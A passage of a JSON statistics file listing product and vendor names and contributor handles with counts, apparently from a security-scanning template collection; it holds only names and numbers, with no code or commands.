"name":"namedprocess","count":1},{"name":"analytify","count":1},{"name":"facade","count":1},{"name":"idemia","count":1},{"name":"ares","count":1},{"name":"html2wp_project","count":1},{"name":"gravitl","count":1},{"name":"wowonder","count":1},{"name":"weheartit","count":1},{"name":"bws-smtp","count":1},{"name":"acemanager","count":1},{"name":"scimono","count":1},{"name":"axxon","count":1},{"name":"webcenter","count":1},{"name":"block","count":1},{"name":"office","count":1},{"name":"video","count":1},{"name":"arduino","count":1},{"name":"graphpaperpress","count":1},{"name":"jinhe-oa-c6","count":1},{"name":"orcus","count":1},{"name":"jooforge","count":1},{"name":"anything-llm","count":1},{"name":"huemagic","count":1},{"name":"geutebruck","count":1},{"name":"frigate","count":1},{"name":"inkysquid","count":1},{"name":"realteo","count":1},{"name":"webence","count":1},{"name":"wftpserver","count":1},{"name":"shield-security","count":1},{"name":"rebuild","count":1},{"name":"slurm","count":1},{"name":"shodan","count":1},{"name":"notolytix","count":1},{"name":"nconf","count":1},{"name":"php_curl_class_project","count":1},{"name":"logstash","count":1},{"name":"metube","count":1},{"name":"travis","count":1},{"name":"pornhub-users","count":1},{"name":"destructoid","count":1},{"name":"prest","count":1},{"name":"baseapp","count":1},{"name":"pluginops","count":1},{"name":"ind780","count":1},{"name":"timesheet_next_gen_project","count":1},{"name":"arkextensions","count":1},{"name":"boostifythemes","count":1},{"name":"narnoo-distributor","count":1},{"name":"stridercd","count":1},{"name":"easyscripts","count":1},{"name":"church_admin_project","count":1},{"name":"pornhub-porn-stars","count":1},{"name":"oauth2","count":1},{"name":"kubeflow","count":1},{"name":"vsco","count":1},{"name":"oembed","count":1},{"name":"phoronix","count":1},{"name":"coder","count":1},{"name":"scratch","count":1},{"name":"aria2","count":1},{"name":"nozomi","count":1},{"name":"appsmith","count":1},{"name":"ultras-diary","count":1},{"name":"jhipster","count":1},{"name":"chinaunicom","count":1},{"name":"wandb","count":1},{"name":"rpcms","count":1},{"name":"binance","count":1},{"name":"exchangerateapi","count":1},{"name":"squidex.io","count":1},{"name":"kanich","count":1},{"name":"wintercms","count":1},{"name":"blogmarks","count":1},{"name":"fortitoken","count":1},{"name":"themeforest","count":1},{"name":"gurock","count":1},{"name":"v2924","count":1},{"name":"diigo","count":1},{"name":"psstaudio","count":1},{"name":"je_form_creator","count":1},{"name":"restler","count":1},{"name":"eyeem","count":1},{"name":"m-bus","count":1},{"name":"allnet","count":1},{"name":"stms","count":1},{"name":"note","count":1},{"name":"softr","count":1},{"name":"ami","count":1},{"name":"eporner","count":1},{"name":"warfareplugins","count":1},{"name":"racksnet","count":1},{"name":"suzuri","count":1},{"name":"flipboard","count":1},{"name":"kopano","count":1},{"name":"pritunl","count":1},{"name":"qwiz-online-quizzes-and-flashcards","count":1},{"name":"mawk","count":1},{"name":"Blogengine","count":1},{"name":"redux","count":1},{"name":"mastodon-countersocial","count":1},{"name":"onimai","count":1},{"name":"whm","count":1},{"name":"grandprof","count":1},{"name":"dicoogle","count":1},{"name":"moinmoin","count":1},{"name":"thedogapi","count":1},{"name":"easy-student-results","count":1},{"name":"lockself","count":1},{"name":"lomnido","count":1},{"name":"webadm","count":1},{"name":"webroot","count":1},{"name":"rubedo_project","count":1},{"name":"erensoft","count":1},{"name":"nbr","count":1},{"name":"tmate","count":1},{"name":"heroplugins","count":1},{"name":"geutebrueck","count":1},{"name":"rumbleuser","count":1},{"name":"myspreadshop","count":1},{"name":"sphinxsearch","count":1},{"name":"fooplugins","count":1},{"name":"chuangtian","count":1},{"name":"etoilewebdesign","count":1},{"name":"membership-database","count":1},{"name":"helmet","count":1},{"name":"orchestrator","count":1},{"name":"netgenie","count":1},{"name":"calendarix","count":1},{"name":"processplus","count":1},{"name":"chemotargets","count":1},{"name":"azure-policy","count":1},{"name":"maipu","count":1},{"name":"archibus","count":1},{"name":"c99","count":1},{"name":"xtreamerat","count":1},{"name":"fansly","count":1},{"name":"jbzd","count":1},{"name":"blockfrost","count":1},{"name":"codecabin","count":1},{"name":"ee","count":1},{"name":"coolify","count":1},{"name":"multilaser","count":1},{"name":"phpnow","count":1},{"name":"hackerrank","count":1},{"name":"erp","count":1},{"name":"quixplorer","count":1},{"name":"wpvivid","count":1},{"name":"keenetic","count":1},{"name":"crowdin","count":1},{"name":"ait-csv","count":1},{"name":"hoverfly","count":1},{"name":"raygun","count":1},{"name":"sunshinephotocart","count":1},{"name":"workresources","count":1},{"name":"ip2whois","count":1},{"name":"h5s","count":1},{"name":"bouqueteditor_project","count":1},{"name":"ecsimagingpacs","count":1},{"name":"trilithic","count":1},{"name":"tensorflow","count":1},{"name":"reqlogic","count":1},{"name":"integrate-google-drive","count":1},{"name":"vinchin","count":1},{"name":"hcpanywhere","count":1},{"name":"mingyu","count":1},{"name":"purchase_order_management_project","count":1},{"name":"np","count":1},{"name":"drone","count":1},{"name":"silenttrinity","count":1},{"name":"mj2","count":1},{"name":"zenario","count":1},{"name":"online_security_guards_hiring_system_project","count":1},{"name":"fatcatapps","count":1},{"name":"alchemy","count":1},{"name":"jinhe","count":1},{"name":"signup","count":1},{"name":"lemlist","count":1}],"authors":[{"name":"dhiyaneshdk","count":1420},{"name":"daffainfo","count":866},{"name":"dwisiswant0","count":802},{"name":"princechaddha","count":498},{"name":"ritikchaddha","count":455},{"name":"pussycat0x","count":452},{"name":"pikpikcu","count":353},{"name":"pdteam","count":302},{"name":"ricardomaia","count":243},{"name":"geeknik","count":231},{"name":"theamanrawat","count":214},{"name":"r3y3r53","count":199},{"name":"righettod","count":183},{"name":"0x_akoko","count":179},{"name":"gy741","count":171},{"name":"rxerium","count":162},{"name":"pdresearch","count":134},{"name":"sleepingbag945","count":132},{"name":"iamnoooob","count":121},{"name":"arafatansari","count":118},{"name":"tess","count":109},{"name":"rootxharsh","count":108},{"name":"idealphase","count":66},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"akincibor","count":59},{"name":"for3stco1d","count":55},{"name":"securityforeveryone","count":52},{"name":"philippedelteil","count":52},{"name":"johnk3r","count":47},{"name":"s4e-io","count":46},{"name":"gaurang","count":42},{"name":"edoardottt","count":40},{"name":"c-sh0","count":35},{"name":"j4vaovo","count":34},{"name":"mastercho","count":32},{"name":"luisfelipe146","count":31},{"name":"adam crosser","count":31},{"name":"ice3man","count":29},{"name":"pwnhxl","count":28},{"name":"ctflearner","count":27},{"name":"hardik-solanki","count":24},{"name":"userdehghani","count":24},{"name":"parthmalhotra","count":24},{"name":"organiccrap","count":24},{"name":"harsh","count":23},{"name":"techbrunchfr","count":23},{"name":"ffffffff0x","count":22},{"name":"0xpugal","count":21},{"name":"kazgangap","count":20},{"name":"sullo","count":19},{"name":"cckuailong","count":18},{"name":"bhutch","count":17},{"name":"lu4nx","count":17},{"name":"random-robbie","count":16},{"name":"shaikhyaser","count":16},{"name":"unapibageek","count":15},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"co5mos","count":14},{"name":"kazet","count":14},{"name":"dogasantos","count":14},{"name":"tenbird","count":14},{"name":"milo2012","count":14},{"name":"r3dg33k","count":14},{"name":"elsfa7110","count":13},{"name":"theabhinavgaur","count":13},{"name":"melbadry9","count":13},{"name":"sharath","count":13},{"name":"0ri2n","count":13},{"name":"nullfuzz","count":13},{"name":"meme-lord","count":12},{"name":"icarot","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"wdahlenb","count":11},{"name":"alph4byt3","count":10},{"name":"random_robbie","count":10},{"name":"logicalhunter","count":10},{"name":"0x240x23elu","count":10},{"name":"hackergautam","count":10},{"name":"nadino","count":10},{"name":"momika233","count":9},{"name":"olearycrew","count":9},{"name":"fabaff","count":9},{"name":"emadshanab","count":9},{"name":"initstring","count":9},{"name":"adamcrosser","count":9},{"name":"oppsec","count":9},{"name":"noraj","count":8},{"name":"zh","count":8},{"name":"irshad ahamed","count":8},{"name":"nodauf","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"_0xf4n9x_","count":8},{"name":"veshraj","count":8},{"name":"its0x08","count":7},{"name":"dr_set","count":7},{"name":"amirhossein raeisi","count":7},{"name":"huta0","count":7},{"name":"caspergn","count":7},{"name":"randomstr1ng","count":7},{"name":"kophjager007","count":7},{"name":"leovalcante","count":7},{"name":"projectdiscoveryai","count":7},{"name":"techryptic (@tech)","count":7},{"name":"r3naissance","count":7},{"name":"amit-jd","count":7},{"name":"divya_mudgal","count":7},{"name":"hahwul","count":7},{"name":"tarunkoyalwar","count":7},{"name":"harshbothra_","count":7},{"name":"puzzlepeaches","count":6},{"name":"gitlab red team","count":6},{"name":"me_dheeraj (https://twitter.com/dheerajmadhukar)","count":6},{"name":"byt3bl33d3r","count":6},{"name":"pentest_swissky","count":6},{"name":"lucky0x0d","count":6},{"name":"nvn1729","count":6},{"name":"ice3man543","count":6},{"name":"xelkomy","count":6},{"name":"forgedhallpass","count":6},{"name":"pathtaga","count":6},{"name":"__fazal","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"ja1sh","count":6},{"name":"justaacat","count":6},{"name":"devang-solanki","count":6},{"name":"evan rubinstein","count":6},{"name":"robotshell","count":6},{"name":"clem9669","count":6},{"name":"imnightmaree","count":6},{"name":"megamansec","count":6},{"name":"panch0r3d","count":5},{"name":"farish","count":5},{"name":"vicrack","count":5},{"name":"defr0ggy","count":5},{"name":"prajiteshsingh","count":5},{"name":"mr-xn","count":5},{"name":"podalirius","count":5},{"name":"s0obi","count":5},{"name":"yanyun","count":5},{"name":"powerexploit","count":5},{"name":"arm!tage","count":5},{"name":"r12w4n","count":5},{"name":"gtrrnr","count":5},{"name":"andreluna","count":5},{"name":"king-alexander","count":5},{"name":"iamnooob","count":5},{"name":"shine","count":5},{"name":"adeljck","count":5},{"name":"kh4sh3i","count":5},{"name":"your3cho","count":5},{"name":"pulsesecurity.co.nz","count":5},{"name":"isacaya","count":5},{"name":"ganofins","count":5},{"name":"cheesymoon","count":4},{"name":"xxcdd","count":4},{"name":"flx","count":4},{"name":"m4lwhere","count":4},{"name":"nybble04","count":4},{"name":"dadevel","count":4},{"name":"shankar acharya","count":4},{"name":"3th1c_yuk1","count":4},{"name":"h1ei1","count":4},{"name":"incogbyte","count":4},{"name":"scent2d","count":4},{"name":"cookiehanhoan","count":4},{"name":"0xr2r","count":4},{"name":"k0pak4","count":4},{"name":"lum8rjack","count":4},{"name":"dolev farhi","count":4},{"name":"joanbono","count":4},{"name":"wisnupramoedya","count":4},{"name":"tanq16","count":4},{"name":"jpg0mez","count":4},{"name":"omranisecurity","count":4},{"name":"ggranjus","count":4},{"name":"heeress","count":4},{"name":"e_schultze_","count":4},{"name":"arcc","count":3},{"name":"huowuzhao","count":3},{"name":"ekrause","count":3},{"name":"0xkayala","count":3},{"name":"swissky","count":3},{"name":"arliya","count":3},{"name":"lark-lab","count":3},{"name":"parth","count":3},{"name":"eeche","count":3},{"name":"shifacyclewala","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"impramodsargar","count":3},{"name":"ph33r","count":3},{"name":"bernardofsr","count":3},{"name":"lucasljm2001","count":3},{"name":"alifathi-h1","count":3},{"name":"jarijaas","count":3},{"name":"whoever","count":3},{"name":"skeltavik","count":3},{"name":"salts","count":3},{"name":"fyoorer","count":3},{"name":"ambassify","count":3},{"name":"f1tz","count":3},{"name":"johnjhacking","count":3},{"name":"soonghee2","count":3},{"name":"thomas_from_offensity","count":3},{"name":"emenalf","count":3},{"name":"dudez","count":3},{"name":"unstabl3","count":3},{"name":"vagnerd","count":3},{"name":"andydoering","count":3},{"name":"randomrobbie","count":3},{"name":"thabisocn","count":3},{"name":"me9187","count":3},{"name":"binaryfigments","count":3},{"name":"true13","count":3},{"name":"persona-twotwo","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"dr0pd34d","count":3},{"name":"charles d","count":3},{"name":"badboycxcc","count":3},{"name":"sushantkamble","count":3},{"name":"fxploit","count":3},{"name":"_generic_human_","count":3},{"name":"z3bd","count":3},{"name":"matt galligan","count":3},{"name":"aringo","count":3},{"name":"taielab","count":3},{"name":"e1a","count":3},{"name":"coldfish","count":3},{"name":"canberbamber","count":3},{"name":"chae1xx1os","count":3},{"name":"imjust0","count":3},{"name":"0w4ys","count":3},{"name":"splint3r7","count":3},{"name":"evergreencartoons","count":3},{"name":"mailler","count":3},{"name":"atomiczsec","count":3},{"name":"c4sper0","count":3},{"name":"davidmckennirey","count":3},{"name":"j3ssie","count":3},{"name":"xianke","count":3},{"name":"vsh00t","count":3},{"name":"mavericknerd","count":3},{"name":"streetofhackerr007","count":2},{"name":"hetroublemakr","count":2},{"name":"serrapa","count":2},{"name":"y4er","count":2},{"name":"socketz","count":2},{"name":"kiblyn11","count":2},{"name":"ajaysenr","count":2},{"name":"foulenzer","count":2},{"name":"s4eio","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"sbani","count":2},{"name":"z0ne","count":2},{"name":"stvnhrlnd","count":2},{"name":"sinkettu","count":2},{"name":"cocxanh","count":2},{"name":"0xrudra","count":2},{"name":"paradessia","count":2},{"name":"herry","count":2},{"name":"0xelkomy","count":2},{"name":"6mile","count":2},{"name":"d4vy","count":2},{"name":"kre80r","count":2},{"name":"github.com/its0x08","count":2},{"name":"amsda","count":2},{"name":"danmcinerney","count":2},{"name":"florianmaak","count":2},{"name":"myztique","count":2},{"name":"dheerajmadhukar","count":2},{"name":"bsysop","count":2},{"name":"lstatro","count":2},{"name":"k11h-de","count":2},{"name":"paperpen","count":2},{"name":"rafaelwdornelas","count":2},{"name":"manas_harsh","count":2},{"name":"dbrwsky","count":2},{"name":"koyejune0302","count":2},{"name":"nkxxkn","count":2},{"name":"ep1csage","count":2},{"name":"gevakun","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"t3l3machus","count":2},{"name":"shankaracharya","count":2},{"name":"udit_thakkur","count":2},{"name":"davidegirardi","count":2},{"name":"usdag","count":2},{"name":"kishore-hariram","count":2},{"name":"0xsapra","count":2},{"name":"bing0o","count":2},{"name":"0xcrypto","count":2},{"name":"bp0lr","count":2},{"name":"zy9ard3","count":2},{"name":"mzack9999","count":2},{"name":"luci","count":2},{"name":"g4l1t0","count":2},{"name":"maximus decimus","count":2},{"name":"vavkamil","count":2},{"name":"sim4110","count":2},{"name":"x1m_martijn","count":2},{"name":"codexlynx","count":2},{"name":"zomsop82","count":2},{"name":"parzival","count":2},{"name":"h0j3n","count":2},{"name":"v0idc0de","count":2},{"name":"joeldeleep","count":2},{"name":"supr4s","count":2},{"name":"topscoder","count":2},{"name":"thezakman","count":2},{"name":"liwermor","count":2},{"name":"8arthur","count":2},{"name":"brenocss","count":2},{"name":"joshua rogers","count":2},{"name":"0xsmiley","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"mrharshvardhan","count":2},{"name":"uomogrande","count":2},{"name":"mys7ic","count":2},{"name":"thardt-praetorian","count":2},{"name":"thefoggiest","count":2},{"name":"brucelsone","count":2},{"name":"bmcel","count":2},{"name":"pxmme1337","count":2},{"name":"n-thumann","count":2},{"name":"w4cky_","count":2},{"name":"redteambrasil","count":2},{"name":"c3l3si4n","count":2},{"name":"sinsinology","count":2},{"name":"martincodes-de","count":2},{"name":"ree4pwn","count":2},{"name":"michal mikolas (nanuqcz)","count":2},{"name":"raesene","count":2},{"name":"egemenkochisarli","count":2},{"name":"msegoviag","count":2},{"name":"joshlarsen","count":2},{"name":"amirmsafari","count":2},{"name":"clarkvoss","count":2},{"name":"dahse89","count":2},{"name":"charles d.","count":2},{"name":"koti2","count":2},{"name":"wa1tf0rme","count":2},{"name":"666asd","count":2},{"name":"pbuff07","count":2},{"name":"thevillagehacker","count":2},{"name":"lotusdll","count":2},{"name":"gal nagli","count":2},{"name":"nuk3s3c","count":2},{"name":"dogancanbakir","count":2},{"name":"bl4ckp4r4d1s3","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"sy3omda","count":2},{"name":"danielmofer","count":2},{"name":"geekby","count":2},{"name":"cheoljun99","count":2},{"name":"korteke","count":2},{"name":"supras","count":2},{"name":"afaq","count":2},{"name":"shelled","count":2},{"name":"alessandro albani - devisions","count":2},{"name":"christianpoeschl","count":2},{"name":"convisoappsec","count":2},{"name":"cckuakilong","count":2},{"name":"randomdhiraj","count":2},{"name":"ayadim","count":2},{"name":"ehsahil","count":2},{"name":"sascha brendel","count":2},{"name":"bananabr","count":2},{"name":"hackerarpan","count":2},{"name":"notnotnotveg","count":2},{"name":"ritesh_gohil(#l4stpl4y3r)","count":2},{"name":"0xnirvana","count":2},{"name":"moritz nentwig","count":2},{"name":"unkl4b","count":1},{"name":"zinminphy0","count":1},{"name":"evan rubinstien","count":1},{"name":"ramondunker","count":1},{"name":"sicksec","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"deena","count":1},{"name":"sherlocksecurity","count":1},{"name":"gpiechnik2","count":1},{"name":"nerrorsec","count":1},{"name":"omarjezi","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"realexp3rt","count":1},{"name":"bywalks","count":1},{"name":"erikowen","count":1},{"name":"luqman","count":1},{"name":"husain","count":1},{"name":"ynnirc","count":1},{"name":"undefl0w","count":1},{"name":"kiransau","count":1},{"name":"qianbenhyu","count":1},{"name":"harksu","count":1},{"name":"kresec","count":1},{"name":"west-wise","count":1},{"name":"piyushchhiroliya","count":1},{"name":"wlayzz","count":1},{"name":"ky9oss","count":1},{"name":"fur1na","count":1},{"name":"tirtha_mandal","count":1},{"name":"shockwave","count":1},{"name":"mr.bobo hp","count":1},{"name":"nukunga","count":1},{"name":"danfaizer","count":1},{"name":"ptonewreckin","count":1},{"name":"yuansec","count":1},{"name":"exid","count":1},{"name":"w0tx","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"mubassirpatel","count":1},{"name":"nan-kl","count":1},{"name":"abdullahisik","count":1},{"name":"naglis","count":1},{"name":"liquidsec","count":1},{"name":"guax1","count":1},{"name":"unknown","count":1},{"name":"compr00t","count":1},{"name":"ap3r","count":1},{"name":"revblock","count":1},{"name":"david botelho mariano","count":1},{"name":"nagli","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"whynotke","count":1},{"name":"manuelbua","count":1},{"name":"jadu101","count":1},{"name":"andysvints","count":1},{"name":"exploitation","count":1},{"name":"yavolo","count":1},{"name":"flag007","count":1},{"name":"fazle arefin","count":1},{"name":"defektive","count":1},{"name":"unp4ck","count":1},{"name":"un-fmunozs","count":1},{"name":"apt-mirror","count":1},{"name":"rahaaaiii","count":1},{"name":"luciannitescu","count":1},{"name":"sumanth vankineni","count":1},{"name":"irshadahamed","count":1},{"name":"r3nz0","count":1},{"name":"pdp","count":1},{"name":"queencitycyber","count":1},{"name":"michal-mikolas","count":1},{"name":"h4kux","count":1},{"name":"r3s ost","count":1},{"name":"francescocarlucci","count":1},{"name":"technicaljunkie","count":1},{"name":"fmunozs","count":1},{"name":"sechunt3r","count":1},{"name":"jbaines-r7","count":1},{"name":"myst7ic","count":1},{"name":"ofjaaah","count":1},{"name":"amnotacat","count":1},{"name":"0xteles","count":1},{"name":"gmeghab","count":1},{"name":"freakyclown","count":1},{"name":"pphuahua","count":1},{"name":"shifacyclewla","count":1},{"name":"omarkurt","count":1},{"name":"zeyad azima","count":1},{"name":"w8ay","count":1},{"name":"secthebit","count":1},{"name":"lamscun","count":1},{"name":"dhiyanesdk","count":1},{"name":"jonathanwalker","count":1},{"name":"drewvravick","count":1},{"name":"chybeta","count":1},{"name":"yhy0","count":1},{"name":"sdcampbell","count":1},{"name":"gonski","count":1},{"name":"lbb","count":1},{"name":"anon-artist","count":1},{"name":"thelicato","count":1},{"name":"affix","count":1},{"name":"mukundbhuva","count":1},{"name":"denandz","count":1},{"name":"thebinitghimire","count":1},{"name":"securitytaters","count":1},{"name":"hexcat","count":1},{"name":"fq_hsu","count":1},{"name":"morgan robertson","count":1},{"name":"apple","count":1},{"name":"s1r1u5_","count":1},{"name":"dale clarke","count":1},{"name":"watchtowr","count":1},{"name":"kareemse1im","count":1},{"name":"pudsec","count":1},{"name":"harryha","count":1},{"name":"jub0bs","count":1},{"name":"kailashbohara","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"majidmc2","count":1},{"name":"lingtren","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"becivells","count":1},{"name":"mlec","count":1},{"name":"hyunsoo-ds","count":1},{"name":"savik","count":1},{"name":"bleron rrustemi","count":1},{"name":"phillipo","count":1},{"name":"numan tĂŒrle","count":1},{"name":"metascan","count":1},{"name":"geraldino2","count":1},{"name":"qotoz","count":1},{"name":"micha3lb3n","count":1},{"name":"prettyboyaaditya","count":1},{"name":"juicypotato1","count":1},{"name":"alperenkesk","count":1},{"name":"aresx","count":1},{"name":"lethargynavigator","count":1},{"name":"clment cruchet","count":1},{"name":"willd96","count":1},{"name":"2rs3c","count":1},{"name":"elder tao","count":1},{"name":"jna1","count":1},{"name":"ling","count":1},{"name":"aaronchen0","count":1},{"name":"nielsing","count":1},{"name":"th3r4id","count":1},{"name":"qlkwej","count":1},{"name":"ruppde","count":1},{"name":"dorkerdevil","count":1},{"name":"spac3wh1te","count":1},{"name":"non-things","count":1},{"name":"mabdullah22","count":1},{"name":"vthiery","count":1},{"name":"0xceba","count":1},{"name":"xiaowangsec","count":1},{"name":"jcockhren","count":1},{"name":"bad5ect0r","count":1},{"name":"lrtk-coder","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"pascalheidmann","count":1},{"name":"rinolock","count":1},{"name":"ldionmarcil","count":1},{"name":"elmahdi","count":1},{"name":"vinit989","count":1},{"name":"davidfegyver","count":1},{"name":"sujal tuladhar","count":1},{"name":"allendemoura","count":1},{"name":"rodnt","count":1},{"name":"kaizensecurity","count":1},{"name":"natto97","count":1},{"name":"imhunterand","count":1},{"name":"notsoevilweasel","count":1},{"name":"bjxsec","count":1},{"name":"_harleo","count":1},{"name":"shivanshkhari","count":1},{"name":"viniciuspereiras","count":1},{"name":"floriandewald","count":1},{"name":"retr0","count":1},{"name":"danigoland","count":1},{"name":"efran","count":1},{"name":"eremit4","count":1},{"name":"puben","count":1},{"name":"cbadke","count":1},{"name":"_darrenmartyn","count":1},{"name":"infosecsanyam","count":1},{"name":"themiddle","count":1},{"name":"carlosvieira","count":1},{"name":"carson chan","count":1},{"name":"d0rkerdevil","count":1},{"name":"droberson","count":1},{"name":"arqsz","count":1},{"name":"andirrahmani1","count":1},{"name":"berkdusunur","count":1},{"name":"mchklt","count":1},{"name":"mah3sec_","count":1},{"name":"kurohost","count":1},{"name":"cravaterouge","count":1},{"name":"borna nematzadeh","count":1},{"name":"tim_koopmans","count":1},{"name":"brabbit10","count":1},{"name":"carrot2","count":1},{"name":"banana69","count":1},{"name":"ingbunga","count":1},{"name":"pwnwithlove","count":1},{"name":"aaban solutions","count":1},{"name":"diablo","count":1},{"name":"iampritam","count":1},{"name":"sickwell","count":1},{"name":"f1she3","count":1},{"name":"push4d","count":1},{"name":"sec_hawk","count":1},{"name":"rschio","count":1},{"name":"caon","count":1},{"name":"archer","count":1},{"name":"nechyo","count":1},{"name":"0ut0fb4nd","count":1},{"name":"rotemreiss","count":1},{"name":"chetgan","count":1},{"name":"zandros0","count":1},{"name":"ooooooo_q","count":1},{"name":"jaimin gondaliya","count":1},{"name":"hakimkt","count":1},{"name":"f0xy","count":1},{"name":"mordavid","count":1},{"name":"elouhi","count":1},{"name":"couskito","count":1},{"name":"0xprial","count":1},{"name":"aron molnar","count":1},{"name":"olewagner","count":1},{"name":"wabafet","count":1},{"name":"miroslavsotak","count":1},{"name":"hardik-rathod","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"erethon","count":1},{"name":"abut0n","count":1},{"name":"screamy","count":1},{"name":"ringo","count":1},{"name":"adnanekhan","count":1},{"name":"5up3r541y4n","count":1},{"name":"patralos","count":1},{"name":"breakpack","count":1},{"name":"sak1","count":1},{"name":"pry0cc","count":1},{"name":"xcapri","count":1},{"name":"rojanrijal","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"mayank_pandey01","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"hczdmr","count":1},{"name":"af001","count":1},{"name":"alevsk","count":1},{"name":"k3rwin","count":1},{"name":"professorabhay","count":1},{"name":"anonymous","count":1},{"name":"udinchan","count":1},{"name":"furkansayim","count":1},{"name":"nytr0gen","count":1},{"name":"sttlr","count":1},{"name":"yashgoti","count":1},{"name":"mhdsamx","count":1},{"name":"b4uh0lz","count":1},{"name":"allenwest24","count":1},{"name":"houdinis","count":1},{"name":"_c0wb0y_","count":1},{"name":"ohlinge","count":1},{"name":"jteles","count":1},{"name":"luskabol","count":1},{"name":"shivampand3y","count":1},{"name":"arr0way","count":1},{"name":"remonsec","count":1},{"name":"marcos_iaf","count":1},{"name":"jaskaran","count":1},{"name":"stupidfish","count":1},{"name":"jeya seelan","count":1},{"name":"wpsec","count":1},{"name":"null_hypothesis","count":1},{"name":"stux","count":1},{"name":"makyotox","count":1},{"name":"adilsoybali","count":1},{"name":"chesterblue","count":1},{"name":"opencirt","count":1},{"name":"zsusac","count":1},{"name":"dawid-czarnecki","count":1},{"name":"orpheus","count":1},{"name":"rotembar","count":1},{"name":"kagamigawa","count":1},{"name":"daffianfo","count":1},{"name":"alpernae","count":1},{"name":"stuxctf","count":1},{"name":"toufik-airane","count":1},{"name":"0xcharan","count":1},{"name":"elitebaz","count":1},{"name":"esonhugh","count":1},{"name":"nobody","count":1},{"name":"smaranchand","count":1},{"name":"n0el4kls","count":1},{"name":"harshinsecurity","count":1},{"name":"p-l-","count":1},{"name":"evolutionsec","count":1},{"name":"josecosta","count":1},{"name":"b0rn2r00t","count":1},{"name":"vulnspace","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"kaks3c","count":1},{"name":"y0no","count":1},{"name":"barttran2000","count":1},{"name":"1337rokudenashi","count":1},{"name":"0h1in9e","count":1},{"name":"fopina","count":1},{"name":"xc1ym","count":1},{"name":"dmartyn","count":1},{"name":"millermedia","count":1},{"name":"igibanez","count":1},{"name":"pratik khalane","count":1},{"name":"michael wedl","count":1},{"name":"mohsen yaghoubi","count":1},{"name":"amir-h-fallahi","count":1},{"name":"godfatherorwa","count":1},{"name":"ipanda","count":1},{"name":"napgh0st","count":1},{"name":"act1on3","count":1},{"name":"yaser_s","count":1},{"name":"notwhy","count":1},{"name":"youngpope","count":1},{"name":"mbmy","count":1},{"name":"iphantasmic","count":1},{"name":"juliosmelo","count":1},{"name":"jc175","count":1},{"name":"arall","count":1},{"name":"alex","count":1},{"name":"blckraven","count":1},{"name":"d4ly","count":1},{"name":"dali","count":1},{"name":"mass0ma","count":1},{"name":"defte","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"intx0x80","count":1},{"name":"akash.c","count":1},{"name":"mihhailsokolov","count":1},{"name":"aringo-bf","count":1},{"name":"dabla","count":1},{"name":"booboohq","count":1},{"name":"ledoubletake","count":1},{"name":"open-sec","count":1},{"name":"daviey","count":1},{"name":"shiva (strobes security)","count":1},{"name":"colbyjack1134","count":1},{"name":"axrk","count":1},{"name":"dk999","count":1},{"name":"knassar702","count":1},{"name":"charanrayudu","count":1},{"name":"jiheon-dev","count":1},{"name":"ransomsec","count":1},{"name":"mayankpandey01","count":1},{"name":"alexrydzak","count":1},{"name":"th3.d1p4k","count":1},{"name":"shiar","count":1},{"name":"worldwidefuckfest","count":1},{"name":"jrolf","count":1},{"name":"gboddin","count":1},{"name":"chron0x","count":1},{"name":"codestuffbreakthings","count":1},{"name":"koratsec","count":1},{"name":"h4sh5","count":1},{"name":"duty_1g","count":1},{"name":"tehtbl","count":1},{"name":"babybash","count":1},{"name":"m0ck3d","count":1},{"name":"0xparth","count":1},{"name":"narluin","count":1},{"name":"luqmaan hadia","count":1},{"name":"kiks7","count":1},{"name":"x6263","count":1},{"name":"hakluke","count":1},{"name":"bartu utku sarp","count":1},{"name":"mantissts","count":1},{"name":"regala_","count":1},{"name":"hotpot","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"noel","count":1},{"name":"xshuden","count":1},{"name":"lambdasawa","count":1},{"name":"staticnoise","count":1},{"name":"official_blackhat13","count":1},{"name":"shreyapohekar","count":1},{"name":"skylark-lab","count":1},{"name":"vikas kundu","count":1},{"name":"adamparsons","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"jas37","count":1},{"name":"amanrawat","count":1},{"name":"mrcl0wnlab","count":1},{"name":"whotwagner","count":1},{"name":"calumjelrick","count":1},{"name":"jeya.seelan","count":1},{"name":"joaonevess","count":1},{"name":"paper-pen","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"ph33rr","count":1},{"name":"co0nan","count":1},{"name":"manasmbellani","count":1},{"name":"ok_bye_now","count":1},{"name":"jfbes","count":1},{"name":"patrick pirker","count":1},{"name":"failopen","count":1},{"name":"akokonunes","count":1},{"name":"galoget","count":1},{"name":"none","count":1},{"name":"mammad_rahimzada","count":1},{"name":"yashanand155","count":1},{"name":"therealtoastycat","count":1},{"name":"ayadi","count":1},{"name":"breno_css","count":1},{"name":"hazana","count":1},{"name":"0xceeb","count":1},{"name":"yiran","count":1},{"name":"pastaga","count":1},{"name":"vince-isec","count":1},{"name":"8authur","count":1},{"name":"noobexploiter","count":1},{"name":"kchason","count":1},{"name":"abbas.heybati","count":1},{"name":"bughuntersurya","count":1},{"name":"miryangjung","count":1},{"name":"lixts","count":1},{"name":"bugvsme","count":1},{"name":"zeroc00i","count":1},{"name":"0xd0ff9","count":1},{"name":"aaron_costello 